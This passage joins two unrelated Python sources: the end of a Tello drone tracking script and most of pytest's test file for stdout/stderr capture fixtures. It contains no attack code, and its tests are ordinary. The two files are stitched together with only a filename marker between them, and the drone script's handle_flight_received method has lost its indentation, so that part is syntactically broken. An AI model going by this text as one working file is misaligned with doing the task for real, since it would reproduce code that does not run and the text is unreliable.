        Mirrors battery/mode/throw-timer into instance attributes and
        detects takeoff/landing transitions via data.em_sky.
        """
        self.battery = data.battery_percentage
        self.fly_mode = data.fly_mode
        self.throw_fly_timer = data.throw_fly_timer
        self.throw_ongoing = data.throw_fly_timer > 0
        # em_sky is truthy while the drone is airborne; act on edges only
        if self.is_flying != data.em_sky:
            self.is_flying = data.em_sky
            log.debug(f"FLYING : {self.is_flying}")
            if not self.is_flying:
                # Just landed: reset the flight state
                self.reset()
            else:
                # Just took off: optionally start tracking (throw_and_go /
                # delayed_takeoff arm tracking_after_takeoff)
                if self.tracking_after_takeoff:
                    log.info("Tracking on after takeoff")
                    self.toggle_tracking(True)
        log.debug(f"MODE: {self.fly_mode} - Throw fly timer: {self.throw_fly_timer}")
    def log_data_handler(self, event, sender, data):
        """
        Listener to log data from the drone.

        Updates the position (relative to the first meaningful MVO reading)
        and the yaw computed from the IMU quaternion; optionally appends a
        CSV line to the log file.
        """
        pos_x = -data.mvo.pos_x
        pos_y = -data.mvo.pos_y
        pos_z = -data.mvo.pos_z
        # Ignore near-zero readings (MVO not initialized yet)
        if abs(pos_x)+abs(pos_y)+abs(pos_z) > 0.07:
            if self.ref_pos_x == -1: # First time we have meaningful values, we store them as reference
                self.ref_pos_x = pos_x
                self.ref_pos_y = pos_y
                self.ref_pos_z = pos_z
            else:
                self.pos_x = pos_x - self.ref_pos_x
                self.pos_y = pos_y - self.ref_pos_y
                self.pos_z = pos_z - self.ref_pos_z
        qx = data.imu.q1
        qy = data.imu.q2
        qz = data.imu.q3
        qw = data.imu.q0
        self.yaw = quat_to_yaw_deg(qx,qy,qz,qw)
        if self.write_log_data:
            if self.write_header:
                self.log_file.write('%s\n' % data.format_cvs_header())
                self.write_header = False
            self.log_file.write('%s\n' % data.format_cvs())
def handle_flight_received(self, event, sender, data):
"""
Create a file in local directory to receive image from the drone
"""
path = f'{self.media_directory}/tello-{datetime.datetime.now().strftime(self.date_fmt)}.jpg'
with open(path, 'wb') as out_file:
out_file.write(data)
log.info('Saved photo to %s' % path)
if __name__ == '__main__':
    # Command line: -l/--log_level selects logging verbosity,
    # -2/--multiprocess splits the work between 2 processes.
    ap=argparse.ArgumentParser()
    ap.add_argument("-l","--log_level", help="select a log level (info, debug)")
    ap.add_argument("-2","--multiprocess", action='store_true', help="use 2 processes to share the workload (instead of 1)")
    args=ap.parse_args()
    main(use_multiprocessing=args.multiprocess, log_level=args.log_level)
test_capture.py | # -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
import io
import os
import pickle
import subprocess
import sys
import textwrap
from io import UnsupportedOperation
import py
from six import text_type
import pytest
from _pytest import capture
from _pytest.capture import CaptureManager
from _pytest.compat import _PY3
from _pytest.main import EXIT_NOTESTSCOLLECTED
# note: py.io capture tests where copied from
# pylib 1.4.20.dev2 (rev 13d9af95547e)
# Skip marker for tests requiring fd-level capture (os.dup)
needsosdup = pytest.mark.skipif(
    not hasattr(os, "dup"), reason="test needs os.dup, not available on this platform"
)
def StdCaptureFD(out=True, err=True, in_=True):
    """Return a MultiCapture that captures at the file-descriptor level."""
    return capture.MultiCapture(out, err, in_, Capture=capture.FDCapture)
def StdCapture(out=True, err=True, in_=True):
    """Return a MultiCapture that captures by replacing sys.stdout/stderr/stdin."""
    return capture.MultiCapture(out, err, in_, Capture=capture.SysCapture)
class TestCaptureManager(object):
    def test_getmethod_default_no_fd(self, monkeypatch):
        # The default capture method is "fd" when os.dup exists, "sys" otherwise.
        from _pytest.capture import pytest_addoption
        from _pytest.config.argparsing import Parser

        parser = Parser()
        pytest_addoption(parser)
        default = parser._groups[0].options[0].default
        assert default == "fd" if hasattr(os, "dup") else "sys"
        parser = Parser()
        monkeypatch.delattr(os, "dup", raising=False)
        pytest_addoption(parser)
        assert parser._groups[0].options[0].default == "sys"

    @pytest.mark.parametrize(
        "method", ["no", "sys", pytest.param("fd", marks=needsosdup)]
    )
    def test_capturing_basic_api(self, method):
        # Outer capture isolates this test's own stdout manipulation.
        capouter = StdCaptureFD()
        old = sys.stdout, sys.stderr, sys.stdin
        try:
            capman = CaptureManager(method)
            capman.start_global_capturing()
            # suspend/read may be called repeatedly without new output
            capman.suspend_global_capture()
            outerr = capman.read_global_capture()
            assert outerr == ("", "")
            capman.suspend_global_capture()
            outerr = capman.read_global_capture()
            assert outerr == ("", "")
            print("hello")
            capman.suspend_global_capture()
            out, err = capman.read_global_capture()
            if method == "no":
                # "no" must leave the standard streams untouched
                assert old == (sys.stdout, sys.stderr, sys.stdin)
            else:
                # output while suspended is not captured
                assert not out
            capman.resume_global_capture()
            print("hello")
            capman.suspend_global_capture()
            out, err = capman.read_global_capture()
            if method != "no":
                assert out == "hello\n"
            capman.stop_global_capturing()
        finally:
            capouter.stop_capturing()

    @needsosdup
    def test_init_capturing(self):
        capouter = StdCaptureFD()
        try:
            capman = CaptureManager("fd")
            capman.start_global_capturing()
            # Starting twice is a programming error and must assert
            pytest.raises(AssertionError, capman.start_global_capturing)
            capman.stop_global_capturing()
        finally:
            capouter.stop_capturing()
@pytest.mark.parametrize("method", ["fd", "sys"])
def test_capturing_unicode(testdir, method):
    # Non-ascii output must survive both capture methods.
    if hasattr(sys, "pypy_version_info") and sys.pypy_version_info < (2, 2):
        pytest.xfail("does not work on pypy < 2.2")
    if sys.version_info >= (3, 0):
        obj = "'b\u00f6y'"
    else:
        obj = "u'\u00f6y'"
    testdir.makepyfile(
        """
        # coding=utf8
        # taken from issue 227 from nosetests
        def test_unicode():
            import sys
            print(sys.stdout)
            print(%s)
        """
        % obj
    )
    result = testdir.runpytest("--capture=%s" % method)
    result.stdout.fnmatch_lines(["*1 passed*"])
@pytest.mark.parametrize("method", ["fd", "sys"])
def test_capturing_bytes_in_utf8_encoding(testdir, method):
    # Printing a string containing a backslash-escaped non-ascii codepoint
    # must not break either capture method.
    testdir.makepyfile(
        """
        def test_unicode():
            print('b\\u00f6y')
        """
    )
    result = testdir.runpytest("--capture=%s" % method)
    result.stdout.fnmatch_lines(["*1 passed*"])
def test_collect_capturing(testdir):
    """stdout/stderr emitted at import time is captured and shown in the
    collection error report (the import of xyz42123 fails)."""
    p = testdir.makepyfile(
        """
        import sys
        print("collect %s failure" % 13)
        sys.stderr.write("collect %s_stderr failure" % 13)
        import xyz42123
        """
    )
    result = testdir.runpytest(p)
    result.stdout.fnmatch_lines(
        [
            "*Captured stdout*",
            "collect 13 failure",
            "*Captured stderr*",
            "collect 13_stderr failure",
        ]
    )
class TestPerTestCapturing(object):
    """Capture semantics at the granularity of individual test phases
    (setup / call / teardown)."""

    def test_capture_and_fixtures(self, testdir):
        """Setup-phase output is reported together with the failing test."""
        p = testdir.makepyfile(
            """
            def setup_module(mod):
                print("setup module")
            def setup_function(function):
                print("setup " + function.__name__)
            def test_func1():
                print("in func1")
                assert 0
            def test_func2():
                print("in func2")
                assert 0
            """
        )
        result = testdir.runpytest(p)
        result.stdout.fnmatch_lines(
            [
                "setup module*",
                "setup test_func1*",
                "in func1*",
                "setup test_func2*",
                "in func2*",
            ]
        )

    @pytest.mark.xfail(reason="unimplemented feature")
    def test_capture_scope_cache(self, testdir):
        """Setup output should be reported in a dedicated section per scope."""
        p = testdir.makepyfile(
            """
            import sys
            def setup_module(func):
                print("module-setup")
            def setup_function(func):
                print("function-setup")
            def test_func():
                print("in function")
                assert 0
            def teardown_function(func):
                print("in teardown")
            """
        )
        result = testdir.runpytest(p)
        result.stdout.fnmatch_lines(
            [
                "*test_func():*",
                "*Captured stdout during setup*",
                "module-setup*",
                "function-setup*",
                "*Captured stdout*",
                "in teardown*",
            ]
        )

    def test_no_carry_over(self, testdir):
        """A passing test's output must not leak into the next test's report."""
        p = testdir.makepyfile(
            """
            def test_func1():
                print("in func1")
            def test_func2():
                print("in func2")
                assert 0
            """
        )
        result = testdir.runpytest(p)
        s = result.stdout.str()
        assert "in func1" not in s
        assert "in func2" in s

    def test_teardown_capturing(self, testdir):
        """Output from setup, call and a failing teardown is all reported."""
        p = testdir.makepyfile(
            """
            def setup_function(function):
                print("setup func1")
            def teardown_function(function):
                print("teardown func1")
                assert 0
            def test_func1():
                print("in func1")
                pass
            """
        )
        result = testdir.runpytest(p)
        result.stdout.fnmatch_lines(
            [
                "*teardown_function*",
                "*Captured stdout*",
                "setup func1*",
                "in func1*",
                "teardown func1*",
                # "*1 fixture failure*"
            ]
        )

    def test_teardown_capturing_final(self, testdir):
        """Output from a failing teardown_module appears in the error report."""
        p = testdir.makepyfile(
            """
            def teardown_module(mod):
                print("teardown module")
                assert 0
            def test_func():
                pass
            """
        )
        result = testdir.runpytest(p)
        result.stdout.fnmatch_lines(
            [
                "*def teardown_module(mod):*",
                "*Captured stdout*",
                "*teardown module*",
                "*1 error*",
            ]
        )

    def test_capturing_outerr(self, testdir):
        """stdout and stderr are captured separately, each in its own section."""
        p1 = testdir.makepyfile(
            """\
            import sys
            def test_capturing():
                print(42)
                sys.stderr.write(str(23))
            def test_capturing_error():
                print(1)
                sys.stderr.write(str(2))
                raise ValueError
            """
        )
        result = testdir.runpytest(p1)
        result.stdout.fnmatch_lines(
            [
                "*test_capturing_outerr.py .F*",
                "====* FAILURES *====",
                "____*____",
                "*test_capturing_outerr.py:8: ValueError",
                "*--- Captured stdout *call*",
                "1",
                "*--- Captured stderr *call*",
                "2",
            ]
        )
class TestLoggingInteraction(object):
    """Interaction between the stdlib logging module and output capturing."""

    def test_logging_stream_ownership(self, testdir):
        """Closing a logging stream created inside a test must not trigger
        errors at interpreter exit."""
        p = testdir.makepyfile(
            """\
            def test_logging():
                import logging
                import pytest
                stream = capture.CaptureIO()
                logging.basicConfig(stream=stream)
                stream.close() # to free memory/release resources
            """
        )
        result = testdir.runpytest_subprocess(p)
        assert result.stderr.str().find("atexit") == -1

    def test_logging_and_immediate_setupteardown(self, testdir):
        """Logging from function-scoped setup/call/teardown is reported."""
        p = testdir.makepyfile(
            """\
            import logging
            def setup_function(function):
                logging.warning("hello1")
            def test_logging():
                logging.warning("hello2")
                assert 0
            def teardown_function(function):
                logging.warning("hello3")
                assert 0
            """
        )
        for optargs in (("--capture=sys",), ("--capture=fd",)):
            print(optargs)
            result = testdir.runpytest_subprocess(p, *optargs)
            s = result.stdout.str()
            result.stdout.fnmatch_lines(
                ["*WARN*hello3", "*WARN*hello1", "*WARN*hello2"]  # errors show first!
            )
            # verify proper termination
            assert "closed" not in s

    def test_logging_and_crossscope_fixtures(self, testdir):
        """Same as above, but with module-scoped setup/teardown logging."""
        p = testdir.makepyfile(
            """\
            import logging
            def setup_module(function):
                logging.warning("hello1")
            def test_logging():
                logging.warning("hello2")
                assert 0
            def teardown_module(function):
                logging.warning("hello3")
                assert 0
            """
        )
        for optargs in (("--capture=sys",), ("--capture=fd",)):
            print(optargs)
            result = testdir.runpytest_subprocess(p, *optargs)
            s = result.stdout.str()
            result.stdout.fnmatch_lines(
                ["*WARN*hello3", "*WARN*hello1", "*WARN*hello2"]  # errors come first
            )
            # verify proper termination
            assert "closed" not in s

    def test_conftestlogging_is_shown(self, testdir):
        """With -s, logging emitted from conftest goes straight to stderr."""
        testdir.makeconftest(
            """\
            import logging
            logging.basicConfig()
            logging.warning("hello435")
            """
        )
        # make sure that logging is still captured in tests
        result = testdir.runpytest_subprocess("-s", "-p", "no:capturelog")
        assert result.ret == EXIT_NOTESTSCOLLECTED
        result.stderr.fnmatch_lines(["WARNING*hello435*"])
        assert "operation on closed file" not in result.stderr.str()

    def test_conftestlogging_and_test_logging(self, testdir):
        """Logging configured in conftest is still captured inside tests."""
        testdir.makeconftest(
            """\
            import logging
            logging.basicConfig()
            """
        )
        # make sure that logging is still captured in tests
        p = testdir.makepyfile(
            """\
            def test_hello():
                import logging
                logging.warning("hello433")
                assert 0
            """
        )
        result = testdir.runpytest_subprocess(p, "-p", "no:capturelog")
        assert result.ret != 0
        result.stdout.fnmatch_lines(["WARNING*hello433*"])
        assert "something" not in result.stderr.str()
        assert "operation on closed file" not in result.stderr.str()

    def test_logging_after_cap_stopped(self, testdir):
        """Logging during fixture teardown after a KeyboardInterrupt must not
        crash with a 'NoneType has no attribute resume_capturing' error."""
        testdir.makeconftest(
            """\
            import pytest
            import logging
            log = logging.getLogger(__name__)
            @pytest.fixture
            def log_on_teardown():
                yield
                log.warning('Logging on teardown')
            """
        )
        # make sure that logging is still captured in tests
        p = testdir.makepyfile(
            """\
            def test_hello(log_on_teardown):
                import logging
                logging.warning("hello433")
                assert 1
                raise KeyboardInterrupt()
            """
        )
        result = testdir.runpytest_subprocess(p, "--log-cli-level", "info")
        assert result.ret != 0
        result.stdout.fnmatch_lines(
            ["*WARNING*hello433*", "*WARNING*Logging on teardown*"]
        )
        assert (
            "AttributeError: 'NoneType' object has no attribute 'resume_capturing'"
            not in result.stderr.str()
        )
class TestCaptureFixture(object):
    """Behaviour of the capsys/capfd/capsysbinary/capfdbinary fixtures."""

    @pytest.mark.parametrize("opt", [[], ["-s"]])
    def test_std_functional(self, testdir, opt):
        """capsys.readouterr() works both with and without -s."""
        reprec = testdir.inline_runsource(
            """\
            def test_hello(capsys):
                print(42)
                out, err = capsys.readouterr()
                assert out.startswith("42")
            """,
            *opt
        )
        reprec.assertoutcome(passed=1)

    def test_capsyscapfd(self, testdir):
        """Requesting capsys and capfd together is a setup error."""
        p = testdir.makepyfile(
            """\
            def test_one(capsys, capfd):
                pass
            def test_two(capfd, capsys):
                pass
            """
        )
        result = testdir.runpytest(p)
        result.stdout.fnmatch_lines(
            [
                "*ERROR*setup*test_one*",
                "E*capfd*capsys*same*time*",
                "*ERROR*setup*test_two*",
                "E*capsys*capfd*same*time*",
                "*2 error*",
            ]
        )

    def test_capturing_getfixturevalue(self, testdir):
        """Test that asking for "capfd" and "capsys" using request.getfixturevalue
        in the same test is an error.
        """
        testdir.makepyfile(
            """\
            def test_one(capsys, request):
                request.getfixturevalue("capfd")
            def test_two(capfd, request):
                request.getfixturevalue("capsys")
            """
        )
        result = testdir.runpytest()
        result.stdout.fnmatch_lines(
            [
                "*test_one*",
                "*capsys*capfd*same*time*",
                "*test_two*",
                "*capfd*capsys*same*time*",
                "*2 failed in*",
            ]
        )

    def test_capsyscapfdbinary(self, testdir):
        """capsys together with capfdbinary is likewise rejected."""
        p = testdir.makepyfile(
            """\
            def test_one(capsys, capfdbinary):
                pass
            """
        )
        result = testdir.runpytest(p)
        result.stdout.fnmatch_lines(
            ["*ERROR*setup*test_one*", "E*capfdbinary*capsys*same*time*", "*1 error*"]
        )

    @pytest.mark.parametrize("method", ["sys", "fd"])
    def test_capture_is_represented_on_failure_issue128(self, testdir, method):
        """Captured output of a failing test shows up in the report (#128)."""
        p = testdir.makepyfile(
            """\
            def test_hello(cap{}):
                print("xxx42xxx")
                assert 0
            """.format(
                method
            )
        )
        result = testdir.runpytest(p)
        result.stdout.fnmatch_lines(["xxx42xxx"])

    @needsosdup
    def test_stdfd_functional(self, testdir):
        """capfd captures raw os.write() output on fd 1."""
        reprec = testdir.inline_runsource(
            """\
            def test_hello(capfd):
                import os
                os.write(1, "42".encode('ascii'))
                out, err = capfd.readouterr()
                assert out.startswith("42")
                capfd.close()
            """
        )
        reprec.assertoutcome(passed=1)

    @needsosdup
    def test_capfdbinary(self, testdir):
        """capfdbinary returns raw bytes, even un-decodable ones."""
        reprec = testdir.inline_runsource(
            """\
            def test_hello(capfdbinary):
                import os
                # some likely un-decodable bytes
                os.write(1, b'\\xfe\\x98\\x20')
                out, err = capfdbinary.readouterr()
                assert out == b'\\xfe\\x98\\x20'
                assert err == b''
            """
        )
        reprec.assertoutcome(passed=1)

    @pytest.mark.skipif(
        sys.version_info < (3,), reason="only have capsysbinary in python 3"
    )
    def test_capsysbinary(self, testdir):
        """capsysbinary returns raw bytes written via sys.stdout.buffer."""
        reprec = testdir.inline_runsource(
            """\
            def test_hello(capsysbinary):
                import sys
                # some likely un-decodable bytes
                sys.stdout.buffer.write(b'\\xfe\\x98\\x20')
                out, err = capsysbinary.readouterr()
                assert out == b'\\xfe\\x98\\x20'
                assert err == b''
            """
        )
        reprec.assertoutcome(passed=1)

    @pytest.mark.skipif(
        sys.version_info >= (3,), reason="only have capsysbinary in python 3"
    )
    def test_capsysbinary_forbidden_in_python2(self, testdir):
        """On python 2, requesting capsysbinary is an explicit error."""
        testdir.makepyfile(
            """\
            def test_hello(capsysbinary):
                pass
            """
        )
        result = testdir.runpytest()
        result.stdout.fnmatch_lines(
            [
                "*test_hello*",
                "*capsysbinary is only supported on Python 3*",
                "*1 error in*",
            ]
        )

    def test_partial_setup_failure(self, testdir):
        """A missing fixture alongside capsys still produces a clean error."""
        p = testdir.makepyfile(
            """\
            def test_hello(capsys, missingarg):
                pass
            """
        )
        result = testdir.runpytest(p)
        result.stdout.fnmatch_lines(["*test_partial_setup_failure*", "*1 error*"])

    @needsosdup
    def test_keyboardinterrupt_disables_capturing(self, testdir):
        """After KeyboardInterrupt, capturing is torn down and pytest exits 2."""
        p = testdir.makepyfile(
            """\
            def test_hello(capfd):
                import os
                os.write(1, str(42).encode('ascii'))
                raise KeyboardInterrupt()
            """
        )
        result = testdir.runpytest_subprocess(p)
        result.stdout.fnmatch_lines(["*KeyboardInterrupt*"])
        assert result.ret == 2

    def test_capture_and_logging(self, testdir):
        """#14"""
        p = testdir.makepyfile(
            """\
            import logging
            def test_log(capsys):
                logging.error('x')
            """
        )
        result = testdir.runpytest_subprocess(p)
        assert "closed" not in result.stderr.str()

    @pytest.mark.parametrize("fixture", ["capsys", "capfd"])
    @pytest.mark.parametrize("no_capture", [True, False])
    def test_disabled_capture_fixture(self, testdir, fixture, no_capture):
        """fixture.disabled() lets output through to the terminal while the
        fixture itself still only records the non-disabled output."""
        testdir.makepyfile(
            """\
            def test_disabled({fixture}):
                print('captured before')
                with {fixture}.disabled():
                    print('while capture is disabled')
                print('captured after')
                assert {fixture}.readouterr() == ('captured before\\ncaptured after\\n', '')

            def test_normal():
                print('test_normal executed')
            """.format(
                fixture=fixture
            )
        )
        args = ("-s",) if no_capture else ()
        result = testdir.runpytest_subprocess(*args)
        result.stdout.fnmatch_lines(
            """
            *while capture is disabled*
            """
        )
        assert "captured before" not in result.stdout.str()
        assert "captured after" not in result.stdout.str()
        if no_capture:
            assert "test_normal executed" in result.stdout.str()
        else:
            assert "test_normal executed" not in result.stdout.str()

    @pytest.mark.parametrize("fixture", ["capsys", "capfd"])
    def test_fixture_use_by_other_fixtures(self, testdir, fixture):
        """
        Ensure that capsys and capfd can be used by other fixtures during setup and teardown.
        """
        testdir.makepyfile(
            """\
            from __future__ import print_function
            import sys
            import pytest

            @pytest.fixture
            def captured_print({fixture}):
                print('stdout contents begin')
                print('stderr contents begin', file=sys.stderr)
                out, err = {fixture}.readouterr()

                yield out, err

                print('stdout contents end')
                print('stderr contents end', file=sys.stderr)
                out, err = {fixture}.readouterr()
                assert out == 'stdout contents end\\n'
                assert err == 'stderr contents end\\n'

            def test_captured_print(captured_print):
                out, err = captured_print
                assert out == 'stdout contents begin\\n'
                assert err == 'stderr contents begin\\n'
            """.format(
                fixture=fixture
            )
        )
        result = testdir.runpytest_subprocess()
        result.stdout.fnmatch_lines(["*1 passed*"])
        assert "stdout contents begin" not in result.stdout.str()
        assert "stderr contents begin" not in result.stdout.str()

    @pytest.mark.parametrize("cap", ["capsys", "capfd"])
    def test_fixture_use_by_other_fixtures_teardown(self, testdir, cap):
        """Ensure we can access setup and teardown buffers from teardown when using capsys/capfd (##3033)"""
        testdir.makepyfile(
            """\
            import sys
            import pytest
            import os

            @pytest.fixture()
            def fix({cap}):
                print("setup out")
                sys.stderr.write("setup err\\n")
                yield
                out, err = {cap}.readouterr()
                assert out == 'setup out\\ncall out\\n'
                assert err == 'setup err\\ncall err\\n'

            def test_a(fix):
                print("call out")
                sys.stderr.write("call err\\n")
            """.format(
                cap=cap
            )
        )
        reprec = testdir.inline_run()
        reprec.assertoutcome(passed=1)
def test_setup_failure_does_not_kill_capturing(testdir):
    """A conftest that raises in pytest_runtest_setup must not break the
    capture machinery for the rest of the session."""
    sub1 = testdir.mkpydir("sub1")
    sub1.join("conftest.py").write(
        textwrap.dedent(
            """\
            def pytest_runtest_setup(item):
                raise ValueError(42)
            """
        )
    )
    sub1.join("test_mod.py").write("def test_func1(): pass")
    result = testdir.runpytest(testdir.tmpdir, "--traceconfig")
    result.stdout.fnmatch_lines(["*ValueError(42)*", "*1 error*"])
def test_fdfuncarg_skips_on_no_osdup(testdir):
    """capfd is skipped (not errored) when os.dup is unavailable."""
    testdir.makepyfile(
        """
        import os
        if hasattr(os, 'dup'):
            del os.dup

        def test_hello(capfd):
            pass
        """
    )
    result = testdir.runpytest_subprocess("--capture=no")
    result.stdout.fnmatch_lines(["*1 skipped*"])
def test_capture_conftest_runtest_setup(testdir):
    """Output printed from a conftest runtest_setup hook is captured."""
    testdir.makeconftest(
        """
        def pytest_runtest_setup():
            print("hello19")
        """
    )
    testdir.makepyfile("def test_func(): pass")
    result = testdir.runpytest()
    assert result.ret == 0
    assert "hello19" not in result.stdout.str()
def test_capture_badoutput_issue412(testdir):
    """Un-decodable bytes written to fd 1 must not crash reporting (#412)."""
    testdir.makepyfile(
        """
        import os

        def test_func():
            omg = bytearray([1,129,1])
            os.write(1, omg)
            assert 0
        """
    )
    # "--cap" is an argparse abbreviation of "--capture"
    result = testdir.runpytest("--cap=fd")
    result.stdout.fnmatch_lines(
        """
        *def test_func*
        *assert 0*
        *Captured*
        *1 failed*
        """
    )
def test_capture_early_option_parsing(testdir):
    """-s must be honoured even for output emitted during early setup hooks."""
    testdir.makeconftest(
        """
        def pytest_runtest_setup():
            print("hello19")
        """
    )
    testdir.makepyfile("def test_func(): pass")
    result = testdir.runpytest("-vs")
    assert result.ret == 0
    assert "hello19" in result.stdout.str()
def test_capture_binary_output(testdir):
    """Binary (non-utf8) bytes written to fd 1 pass through cleanly, both
    directly and from a re-invoked subprocess."""
    testdir.makepyfile(
        r"""
        import pytest

        def test_a():
            import sys
            import subprocess
            subprocess.call([sys.executable, __file__])

        def test_foo():
            import os;os.write(1, b'\xc3')

        if __name__ == '__main__':
            test_foo()
        """
    )
    result = testdir.runpytest("--assert=plain")
    result.assert_outcomes(passed=2)
def test_error_during_readouterr(testdir):
    """Make sure we suspend capturing if errors occur during readouterr"""
    testdir.makepyfile(
        pytest_xyz="""
        from _pytest.capture import FDCapture

        def bad_snap(self):
            raise Exception('boom')

        assert FDCapture.snap
        FDCapture.snap = bad_snap
        """
    )
    result = testdir.runpytest_subprocess("-p", "pytest_xyz", "--version")
    result.stderr.fnmatch_lines(
        ["*in bad_snap", "    raise Exception('boom')", "Exception: boom"]
    )
class TestCaptureIO(object):
    """Behaviour of the in-memory CaptureIO text buffer."""

    def test_text(self):
        """Plain text writes round-trip through getvalue()."""
        f = capture.CaptureIO()
        f.write("hello")
        s = f.getvalue()
        assert s == "hello"
        f.close()

    def test_unicode_and_str_mixture(self):
        """py3 rejects bytes; py2 accepts a mix of bytes and unicode."""
        f = capture.CaptureIO()
        if sys.version_info >= (3, 0):
            f.write("\u00f6")
            pytest.raises(TypeError, f.write, b"hello")
        else:
            f.write(u"\u00f6")
            f.write(b"hello")
        s = f.getvalue()
        f.close()
        assert isinstance(s, text_type)

    @pytest.mark.skipif(sys.version_info[0] == 2, reason="python 3 only behaviour")
    def test_write_bytes_to_buffer(self):
        """In python3, stdout / stderr are text io wrappers (exposing a buffer
        property of the underlying bytestream). See issue #1407
        """
        f = capture.CaptureIO()
        f.buffer.write(b"foo\r\n")
        assert f.getvalue() == "foo\r\n"
def test_dontreadfrominput():
    """The stdin replacement refuses all reads and has no real fileno."""
    from _pytest.capture import DontReadFromInput

    f = DontReadFromInput()
    assert not f.isatty()
    pytest.raises(IOError, f.read)
    pytest.raises(IOError, f.readlines)
    iter_f = iter(f)
    pytest.raises(IOError, next, iter_f)
    pytest.raises(UnsupportedOperation, f.fileno)
    f.close()  # just for completeness
@pytest.mark.skipif("sys.version_info < (3,)", reason="python2 has no buffer")
def test_dontreadfrominput_buffer_python3():
    """On py3 the .buffer attribute behaves like the wrapper itself."""
    from _pytest.capture import DontReadFromInput

    f = DontReadFromInput()
    fb = f.buffer
    assert not fb.isatty()
    pytest.raises(IOError, fb.read)
    pytest.raises(IOError, fb.readlines)
    iter_f = iter(f)
    pytest.raises(IOError, next, iter_f)
    pytest.raises(ValueError, fb.fileno)
    f.close()  # just for completeness
@pytest.mark.skipif("sys.version_info >= (3,)", reason="python2 has no buffer")
def test_dontreadfrominput_buffer_python2():
    """On py2 there is no .buffer attribute at all."""
    from _pytest.capture import DontReadFromInput

    f = DontReadFromInput()
    with pytest.raises(AttributeError):
        f.buffer
    f.close()  # just for completeness
@pytest.yield_fixture
def tmpfile(testdir):
    # a fresh binary read/write file in the testdir tmpdir, closed on teardown
    f = testdir.makepyfile("").open("wb+")
    yield f
    if not f.closed:
        f.close()
@needsosdup
def test_dupfile(tmpfile):
    """safe_text_dupfile returns distinct dup'd wrappers that all write to
    the same underlying file; closing one does not affect the original."""
    flist = []
    for i in range(5):
        nf = capture.safe_text_dupfile(tmpfile, "wb")
        assert nf != tmpfile
        assert nf.fileno() != tmpfile.fileno()
        assert nf not in flist
        print(i, end="", file=nf)
        flist.append(nf)

    fname_open = flist[0].name
    assert fname_open == repr(flist[0].buffer)

    for i in range(5):
        f = flist[i]
        f.close()
    fname_closed = flist[0].name
    assert fname_closed == repr(flist[0].buffer)
    assert fname_closed != fname_open

    tmpfile.seek(0)
    s = tmpfile.read()
    assert "01234" in repr(s)
    tmpfile.close()
    assert fname_closed == repr(flist[0].buffer)
def test_dupfile_on_bytesio():
    """A BytesIO (no fileno) is wrapped in a text layer instead of dup'd."""
    bio = io.BytesIO()
    f = capture.safe_text_dupfile(bio, "wb")
    f.write("hello")
    assert bio.getvalue() == b"hello"
    assert "BytesIO object" in f.name
def test_dupfile_on_textio():
    """A TextIO (already text, no fileno) is returned as a text wrapper."""
    tio = py.io.TextIO()
    f = capture.safe_text_dupfile(tio, "wb")
    f.write("hello")
    assert tio.getvalue() == "hello"
    assert not hasattr(f, "name")
@contextlib.contextmanager
def lsof_check():
    """Fail the wrapped block if it leaks open regular files.

    Snapshots this process's open files via ``lsof`` before and after the
    block and asserts the count of "REG" entries did not grow by 3 or more.
    Skips when ``lsof`` is unavailable or its output cannot be decoded.
    """
    pid = os.getpid()

    def reg_count(output):
        # one lsof line per open file; "REG" marks regular files
        return sum(1 for line in output.split("\n") if "REG" in line)

    try:
        before = subprocess.check_output(("lsof", "-p", str(pid))).decode()
    except (OSError, subprocess.CalledProcessError, UnicodeDecodeError):
        # about UnicodeDecodeError, see note on pytester
        pytest.skip("could not run 'lsof'")
    yield
    after = subprocess.check_output(("lsof", "-p", str(pid))).decode()
    assert reg_count(after) < reg_count(before) + 3, after
class TestFDCapture(object):
    """Low-level FDCapture behaviour: redirecting OS-level file descriptors."""

    pytestmark = needsosdup

    def test_simple(self, tmpfile):
        """Nothing is captured before start(); writes after start() are snapped."""
        fd = tmpfile.fileno()
        cap = capture.FDCapture(fd)
        data = b"hello"
        os.write(fd, data)
        s = cap.snap()
        cap.done()
        assert not s
        cap = capture.FDCapture(fd)
        cap.start()
        os.write(fd, data)
        s = cap.snap()
        cap.done()
        assert s == "hello"

    def test_simple_many(self, tmpfile):
        """Repeated capture cycles on the same fd keep working."""
        for i in range(10):
            self.test_simple(tmpfile)

    def test_simple_many_check_open_files(self, testdir):
        """Repeated capture cycles must not leak file descriptors."""
        with lsof_check():
            with testdir.makepyfile("").open("wb+") as tmpfile:
                self.test_simple_many(tmpfile)

    def test_simple_fail_second_start(self, tmpfile):
        """start() after done() raises ValueError."""
        fd = tmpfile.fileno()
        cap = capture.FDCapture(fd)
        cap.done()
        pytest.raises(ValueError, cap.start)

    def test_stderr(self):
        """Capturing fd 2 picks up text printed to sys.stderr."""
        cap = capture.FDCapture(2)
        cap.start()
        print("hello", file=sys.stderr)
        s = cap.snap()
        cap.done()
        assert s == "hello\n"

    def test_stdin(self, tmpfile):
        """Captured stdin reads as empty."""
        cap = capture.FDCapture(0)
        cap.start()
        x = os.read(0, 100).strip()
        cap.done()
        assert x == b""

    def test_writeorg(self, tmpfile):
        """writeorg() bypasses capturing and writes to the original file."""
        data1, data2 = b"foo", b"bar"
        cap = capture.FDCapture(tmpfile.fileno())
        cap.start()
        tmpfile.write(data1)
        tmpfile.flush()
        cap.writeorg(data2)
        scap = cap.snap()
        cap.done()
        assert scap == data1.decode("ascii")
        with open(tmpfile.name, "rb") as stmp_file:
            stmp = stmp_file.read()
            assert stmp == data2

    def test_simple_resume_suspend(self, tmpfile):
        """suspend()/resume() toggle capturing; suspend after done() raises."""
        with saved_fd(1):
            cap = capture.FDCapture(1)
            cap.start()
            data = b"hello"
            os.write(1, data)
            sys.stdout.write("whatever")
            s = cap.snap()
            assert s == "hellowhatever"
            cap.suspend()
            os.write(1, b"world")
            sys.stdout.write("qlwkej")
            assert not cap.snap()
            cap.resume()
            os.write(1, b"but now")
            sys.stdout.write(" yes\n")
            s = cap.snap()
            assert s == "but now yes\n"
            cap.suspend()
            cap.done()
            pytest.raises(AttributeError, cap.suspend)

    def test_capfd_sys_stdout_mode(self, capfd):
        # under capfd, sys.stdout must remain a text-mode stream
        assert "b" not in sys.stdout.mode
@contextlib.contextmanager
def saved_fd(fd):
    """Snapshot file descriptor *fd* and restore it when the block exits.

    A duplicate of *fd* is taken up front; on exit the duplicate is copied
    back over *fd* (undoing any redirection done inside the block) and the
    duplicate itself is closed.
    """
    backup = os.dup(fd)
    try:
        yield
    finally:
        os.dup2(backup, fd)
        os.close(backup)
class TestStdCapture(object):
